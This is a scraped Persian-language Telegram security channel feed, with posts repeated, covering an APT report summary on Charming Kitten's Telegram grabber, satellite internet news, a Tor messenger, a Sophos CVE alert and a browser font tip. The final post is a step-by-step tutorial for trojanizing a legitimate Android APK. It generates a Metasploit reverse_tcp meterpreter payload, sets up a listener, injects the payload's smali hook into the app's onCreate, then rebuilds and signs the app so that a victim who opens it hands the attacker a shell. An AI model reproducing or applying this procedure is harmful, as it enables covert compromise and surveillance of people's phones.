Old cat, new tricks, bad habits
محققای pwc گزارشی منتشر کردن در خصوص یه APT مرتبط با ایران بنام Yellow Garuda که با نامهای Charming Kitten و PHOSPHORUS و UNC788 هم شناخته میشن و از 2012 فعال هستن.
تو این گزارش به بررسی ابزارها و تکنیکهاشون و همچنین خطاهای OPSEC که منجر به شناسایی ابزارهاشون شده اشاره شده.
این گروه یه ابزاری داشتن که ازش برای گرفتن اطلاعات مرتبط با تلگرام مانند گروهها ، چتها ، فایلها و ... استفاده می کردن که تو گزارش اسم grabber رو گذاشتن.
محققا اومدن یه مدتی زیرساخت این APT رو اسکن کردن و در نتیجه یسری فایل فشرده ازش پیدا کردن که حاوی فایل grabber و اطلاعات استخراج شده از قربانیه (7 فایل فشرده) . این داده ها رو که بررسی کردن متوجه شدند که 6 تا موردش مرتبط با grabber و یه موردش احتمالا مرتبط با بدافزار موبایلیشونه که احتمالا بدافزار PINEFLOWER هستش. چون تاریخ داده ها شمسی بوده و شماره اهداف هم کد ایران (98) داشته مشخصا اهداف داخل ایران بودند.
این برنامه در زبان سی پلاس نوشته شده و از کتابخانه TDLib استفاده میکرده. برای دسترسی به تلگرام اهداف هم ،نیاز به داشتن کد ورود و در برخی موارد کد 2 مرحله ای بوده که اینا رو هم احتمالا با دسترسی به ایمیل یا بدافزار موبایلی میتونستن بدست بیارن.
بعد از دسترسی هم میتونستن فایلهای با فرمت دلخواه یا چت های یه بازه زمانی خاص و ... استخراج کنن. علاوه بر استخراج امکان حذف پیام رو هم داشتن.
با بررسی که تو VT انجام دادند متوجه شدند که این ابزار تو یه بازه 31 روزه آپلود شده (15 بار) و با بررسی که کردند متوجه شدند که این آپلودها تو مرحله تست انجام شده.
تو یکی از این فایلها یه گزارش پیدا کردند که توسط عوامل تهدید ، اطلاعات هویتی و وضعیت نظارت روی قربانی رو مستند کرده بودند.
در ادامه گزارش هم به بررسی استفاده این گروه از remote template injection و ماکروها تو اسناد آفیس اشاره کرده .
تو گزارش اومده که از موضوعات روز و اخباری که تو سایتهای انگلیسی منتشر میشده ، برای فریب اهداف استفاده می کردن.
@SecComputer
محققای pwc گزارشی منتشر کردن در خصوص یه APT مرتبط با ایران بنام Yellow Garuda که با نامهای Charming Kitten و PHOSPHORUS و UNC788 هم شناخته میشن و از 2012 فعال هستن.
تو این گزارش به بررسی ابزارها و تکنیکهاشون و همچنین خطاهای OPSEC که منجر به شناسایی ابزارهاشون شده اشاره شده.
این گروه یه ابزاری داشتن که ازش برای گرفتن اطلاعات مرتبط با تلگرام مانند گروهها ، چتها ، فایلها و ... استفاده می کردن که تو گزارش اسم grabber رو گذاشتن.
محققا اومدن یه مدتی زیرساخت این APT رو اسکن کردن و در نتیجه یسری فایل فشرده ازش پیدا کردن که حاوی فایل grabber و اطلاعات استخراج شده از قربانیه (7 فایل فشرده) . این داده ها رو که بررسی کردن متوجه شدند که 6 تا موردش مرتبط با grabber و یه موردش احتمالا مرتبط با بدافزار موبایلیشونه که احتمالا بدافزار PINEFLOWER هستش. چون تاریخ داده ها شمسی بوده و شماره اهداف هم کد ایران (98) داشته مشخصا اهداف داخل ایران بودند.
این برنامه در زبان سی پلاس نوشته شده و از کتابخانه TDLib استفاده میکرده. برای دسترسی به تلگرام اهداف هم ،نیاز به داشتن کد ورود و در برخی موارد کد 2 مرحله ای بوده که اینا رو هم احتمالا با دسترسی به ایمیل یا بدافزار موبایلی میتونستن بدست بیارن.
بعد از دسترسی هم میتونستن فایلهای با فرمت دلخواه یا چت های یه بازه زمانی خاص و ... استخراج کنن. علاوه بر استخراج امکان حذف پیام رو هم داشتن.
با بررسی که تو VT انجام دادند متوجه شدند که این ابزار تو یه بازه 31 روزه آپلود شده (15 بار) و با بررسی که کردند متوجه شدند که این آپلودها تو مرحله تست انجام شده.
تو یکی از این فایلها یه گزارش پیدا کردند که توسط عوامل تهدید ، اطلاعات هویتی و وضعیت نظارت روی قربانی رو مستند کرده بودند.
در ادامه گزارش هم به بررسی استفاده این گروه از remote template injection و ماکروها تو اسناد آفیس اشاره کرده .
تو گزارش اومده که از موضوعات روز و اخباری که تو سایتهای انگلیسی منتشر میشده ، برای فریب اهداف استفاده می کردن.
@SecComputer
PwC
Cyber Threat Intelligence
PwC delivers an innovative combination of human ingenuity and technologies to assess the global threat landscape, helping to protect against disruptions and data losses.
👍15
اینترنت ماهوارهای؛ رقیب اروپایی برای استارلینک ایلان ماسک
شرکتهای ماهوارهای فرانسوی و بریتانیایی یوتلست و وانوب اعلام کردند که قصد دارند ادغام شوند تا به گفته خودشان به «قهرمان جهانی» اینترنت ماهوارهای تبدیل شوند.
شرکت حاصل از ادغام این دو رقیب اروپایی شرکت آمریکایی استارلینک متعلق به ایلان ماسک خواهد بود.
یوتلست ۳۶ ماهواره در مدار زمینایستا دارد و وانوب دارای صدها ماهواره در مدار پایینی زمین است.
شرکتهای اینترنت ماهوارهای وعده پوشش اینترنتی دورافتادهترین نقاط زمین را بدون نصب دکل میدهند.
(منبع: بیبیسی)
#اینترنت_ماهواره #اینترنت #ایلان_ماسک #اسپیس_ایکس
@SecComputer
شرکتهای ماهوارهای فرانسوی و بریتانیایی یوتلست و وانوب اعلام کردند که قصد دارند ادغام شوند تا به گفته خودشان به «قهرمان جهانی» اینترنت ماهوارهای تبدیل شوند.
شرکت حاصل از ادغام این دو رقیب اروپایی شرکت آمریکایی استارلینک متعلق به ایلان ماسک خواهد بود.
یوتلست ۳۶ ماهواره در مدار زمینایستا دارد و وانوب دارای صدها ماهواره در مدار پایینی زمین است.
شرکتهای اینترنت ماهوارهای وعده پوشش اینترنتی دورافتادهترین نقاط زمین را بدون نصب دکل میدهند.
(منبع: بیبیسی)
#اینترنت_ماهواره #اینترنت #ایلان_ماسک #اسپیس_ایکس
@SecComputer
👍26🤬1
Anonymous Messenger
#حریم_خصوصی
یک پیام رسان همتا به همتا p2p با tor.
️پیام های صوتی
calls️
تماس تلفنی مستقیم از طریق tor
️
حذف فراداده از پیامها و فایلهای ارسالی
ارسال فایلهای خام در هر اندازه (100 گیگابایت +)
️هر دو کاربر باید آدرس onion را به یکدیگر اضافه کنند تا بتوانند ارتباط برقرار کنند
messages️
پیام های ناپدید شده به طور پیش فرض
storage️
ذخیره سازی فایل رمزگذاری شده در Android
رمزگذاری Diffie-Hellman
#اوپن_سورس
https://git.anonymousmessenger.ly/dx/AnonymousMessenger
لینک دانلود
https://anonymousmessenger.ly/fdroid/repo/app-debug.apk
F-droid: https://f-droid.org/packages/com.dx.anonymousmessenger/
گوگل پلی
https://play.google.com/store/apps/details?id=com.dx.anonymousmessenger
وب سایت:
https://anonymousmessenger.ly
@SecComputer
#حریم_خصوصی
یک پیام رسان همتا به همتا p2p با tor.
️پیام های صوتی
calls️
تماس تلفنی مستقیم از طریق tor
️
حذف فراداده از پیامها و فایلهای ارسالی
ارسال فایلهای خام در هر اندازه (100 گیگابایت +)
️هر دو کاربر باید آدرس onion را به یکدیگر اضافه کنند تا بتوانند ارتباط برقرار کنند
messages️
پیام های ناپدید شده به طور پیش فرض
storage️
ذخیره سازی فایل رمزگذاری شده در Android
رمزگذاری Diffie-Hellman
#اوپن_سورس
https://git.anonymousmessenger.ly/dx/AnonymousMessenger
لینک دانلود
https://anonymousmessenger.ly/fdroid/repo/app-debug.apk
F-droid: https://f-droid.org/packages/com.dx.anonymousmessenger/
گوگل پلی
https://play.google.com/store/apps/details?id=com.dx.anonymousmessenger
وب سایت:
https://anonymousmessenger.ly
@SecComputer
👍4❤2🔥2
آسیبپذیری فایروال Sophos به هکرها کلیدهای پادشاهی را میدهد
♨️ حدود دو ماه پیش، یک آسیبپذیری دور زدن احراز هویت (authentication bypass) که امکان اجرای باگ RCE را می داد در پورتال کاربر و وبادمین فایروال Sophos کشف شد. شناسه آسیب پذیری CVE-2022-1040 می باشد و از نوع اجرای کد از راه دور یا به اصطلاح RCE است.
شرکت فایروال Sophos به مشتریان خود اعلام کرده که هیچ اقدامی جز فعال کردن ویژگی "Allow automatic installation of hotfixes" لازم نیست.
⚡️ نکته خیلی مهم:
به گفته سایت رسمی شرکت Sophos : این آسیب پذیری برای هدف قرار دادن سازمان های خاص عمدتاً در منطقه جنوب آسیا استفاده می شود.
👈 حدود 2.700 فایروال sophos در کشور ایران فعال است و یک آسیب پذیری حیاتی در زیر ساخت کشور محسوب می شود.
👈 متاسفانه سایت افتا و مرکز ماهر حتی کوچکترین اشاره ای در پست ها و اخبار خود به این آسیب پذیری نکردند.
با توجه به این که در ماه های اخیر حملات سایبری به صنایع کشور گسترش زیادی داشته، باید با جدیت بیشتری مسئولین امر پیگیر این موضوع باشند. 🙏
@SecComputer
♨️ حدود دو ماه پیش، یک آسیبپذیری دور زدن احراز هویت (authentication bypass) که امکان اجرای باگ RCE را می داد در پورتال کاربر و وبادمین فایروال Sophos کشف شد. شناسه آسیب پذیری CVE-2022-1040 می باشد و از نوع اجرای کد از راه دور یا به اصطلاح RCE است.
شرکت فایروال Sophos به مشتریان خود اعلام کرده که هیچ اقدامی جز فعال کردن ویژگی "Allow automatic installation of hotfixes" لازم نیست.
⚡️ نکته خیلی مهم:
به گفته سایت رسمی شرکت Sophos : این آسیب پذیری برای هدف قرار دادن سازمان های خاص عمدتاً در منطقه جنوب آسیا استفاده می شود.
👈 حدود 2.700 فایروال sophos در کشور ایران فعال است و یک آسیب پذیری حیاتی در زیر ساخت کشور محسوب می شود.
👈 متاسفانه سایت افتا و مرکز ماهر حتی کوچکترین اشاره ای در پست ها و اخبار خود به این آسیب پذیری نکردند.
با توجه به این که در ماه های اخیر حملات سایبری به صنایع کشور گسترش زیادی داشته، باید با جدیت بیشتری مسئولین امر پیگیر این موضوع باشند. 🙏
@SecComputer
SOPHOS
Cybersecurity as a Service Delivered | Sophos
We Deliver Superior Cybersecurity Outcomes for Real-World Organizations Worldwide with a Broad Portfolio of Advanced Security Products and Services.
👍15❤1
🔴ایجاد انقلاب بزرگ در اینترنت موبایل / اینترنت ماهوارهای استارلینک در دسترس کاربران موبایل قرار میگیرد
🔹طبق اسنادی که در FCC به ثبت رسیده، اسپیس ایکس قصد دارد اینترنت ماهوارهای استارلینک را در دسترس گوشیهای موبایل اندرویدی و iOS قرار داده و فرکانس 2 گیگاهرتزی را به مجوز استارلینک خود اضافه کند.
🔹اضافه کردن فرکانس 2 گیگاهرتزی به سرویس استارلینک به این معنی است که سیگنالهای آن کمتر تحت تاثیر موانع فیزیکی قرار میگیرند تا برای دستگاههای کوچکتر مانند گوشیهای هوشمند مناسب باشند. اسپیس ایکس در پرونده خود توضیح میدهد که این کار به نفع تمام مشترکین این سرویس در آمریکا خواهد بود.
🔹 به این ترتیب کشورهایی که در اینترنت اختلال ایجاد می کنند بزودی با مشکلی بدون راه حل مواجه شده و کاربران اینترنت در سراسر جهان دسترسی به اینترنت آزاد را تجربه خواهند کرد.
🔹هنوز در مورد هزینه این اینترنت خبری منتشر نشده است.
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🔹طبق اسنادی که در FCC به ثبت رسیده، اسپیس ایکس قصد دارد اینترنت ماهوارهای استارلینک را در دسترس گوشیهای موبایل اندرویدی و iOS قرار داده و فرکانس 2 گیگاهرتزی را به مجوز استارلینک خود اضافه کند.
🔹اضافه کردن فرکانس 2 گیگاهرتزی به سرویس استارلینک به این معنی است که سیگنالهای آن کمتر تحت تاثیر موانع فیزیکی قرار میگیرند تا برای دستگاههای کوچکتر مانند گوشیهای هوشمند مناسب باشند. اسپیس ایکس در پرونده خود توضیح میدهد که این کار به نفع تمام مشترکین این سرویس در آمریکا خواهد بود.
🔹 به این ترتیب کشورهایی که در اینترنت اختلال ایجاد می کنند بزودی با مشکلی بدون راه حل مواجه شده و کاربران اینترنت در سراسر جهان دسترسی به اینترنت آزاد را تجربه خواهند کرد.
🔹هنوز در مورد هزینه این اینترنت خبری منتشر نشده است.
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍35👎3👏3👌1
♨️ چه فونتیه؟!
🌀 خیلی وقتا شده وارد یک صفحه وب شدیم و اسم فونتی که اون سایت استفاده کرده برامون جالب بوده ، تو این آموزش قراره بگیم چطور میشه اسم فونت صفحه وب رو پیدا کرد ...
🔹راه حل اول :
استفاده از قابلیت inspect مرورگرها هست .
در این روش کلیدهای ctrl+shift+c رو با هم فشار میدیم و سپس هر جایی که نشانگر موس قرار بگیره ، فونت و استایل های متن قابل مشاهده هستن :)
🔹راه حل دوم :
استفاده از افزونه ی WhatFont کروم هستش که بعد از نصب این افزونه وارد هر صفحه وبی که بشید و نشانگر موس رو روی المان قرار بدید ، اسم فونت بصورت tooltip براتون به نمایش در میاد 👌
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🌀 خیلی وقتا شده وارد یک صفحه وب شدیم و اسم فونتی که اون سایت استفاده کرده برامون جالب بوده ، تو این آموزش قراره بگیم چطور میشه اسم فونت صفحه وب رو پیدا کرد ...
🔹راه حل اول :
استفاده از قابلیت inspect مرورگرها هست .
در این روش کلیدهای ctrl+shift+c رو با هم فشار میدیم و سپس هر جایی که نشانگر موس قرار بگیره ، فونت و استایل های متن قابل مشاهده هستن :)
🔹راه حل دوم :
استفاده از افزونه ی WhatFont کروم هستش که بعد از نصب این افزونه وارد هر صفحه وبی که بشید و نشانگر موس رو روی المان قرار بدید ، اسم فونت بصورت tooltip براتون به نمایش در میاد 👌
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍19👎2❤1😱1
Forwarded from ——
final_version_4.3.6.rar
9 MB
pass : redteam_channel_z
کتاب پر حاشیه سکیوریتی پلاس نسخه اصلی به همراه خلاصه نویسی و ترجمه(درک مطلب)
کتاب پر حاشیه سکیوریتی پلاس نسخه اصلی به همراه خلاصه نویسی و ترجمه(درک مطلب)
👍11👎1
✅ معرفی اپلیکیشن Mintal
🔸با استفاده از این اپلکیشن میتونید عکسای بی کیفتتون رو با کیفیت کنید، فقط کافیه اپلیکشن رو نصب کنید و طبق مراحل بالا عمل کنید.
📲 نسخه اندروید
➖➖➖➖➖➖➖➖➖
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
🔸با استفاده از این اپلکیشن میتونید عکسای بی کیفتتون رو با کیفیت کنید، فقط کافیه اپلیکشن رو نصب کنید و طبق مراحل بالا عمل کنید.
📲 نسخه اندروید
➖➖➖➖➖➖➖➖➖
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍8👎2
📡فیس بوک شبیه تیکتاک میشود
◽️شرکت مِتا پلتفرمز در نحوه نمایش پستها و ویدیوها در فیسبوک تغییراتی میدهد تا این شبکه اجتماعی بهتر بتواند با اپلیکیشن ویدیویی تیک تاک رقابت کند.
+ این درحالیست که یکی از اعضای فدرال آمریکا اخیرا اعلام کرده بود تا اپلیکیشن چینی"تیک تاک" باید از فروشگاه پلی و اپ استور حذف شود...
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
◽️شرکت مِتا پلتفرمز در نحوه نمایش پستها و ویدیوها در فیسبوک تغییراتی میدهد تا این شبکه اجتماعی بهتر بتواند با اپلیکیشن ویدیویی تیک تاک رقابت کند.
+ این درحالیست که یکی از اعضای فدرال آمریکا اخیرا اعلام کرده بود تا اپلیکیشن چینی"تیک تاک" باید از فروشگاه پلی و اپ استور حذف شود...
#VIP Channel ID:@Code_Jobs🎗
🆔@SecComputer
#GP:@ITSecgp
👍23👎10🤔1
ساخت رات و پنهان سازی ان در APK
خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk
نوبت به ساخت رات میرسه :
1- ترمینال را باز کرده
2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]\rat.apk
خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:
ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]\rat.apk -o [mahal folder zakhire sazi]\rat
2-apktool d [mahal apk]\ye chizi.apk -o [mahal zakhire sazi apk]\ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV
خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]\bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]\bindedrat.apk [makan delkhah]\signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند
@SecComputer
خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk
نوبت به ساخت رات میرسه :
1- ترمینال را باز کرده
2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]\rat.apk
خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:
ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]\rat.apk -o [mahal folder zakhire sazi]\rat
2-apktool d [mahal apk]\ye chizi.apk -o [mahal zakhire sazi apk]\ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV
خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]\bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]\bindedrat.apk [makan delkhah]\signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند
@SecComputer
👍18❤3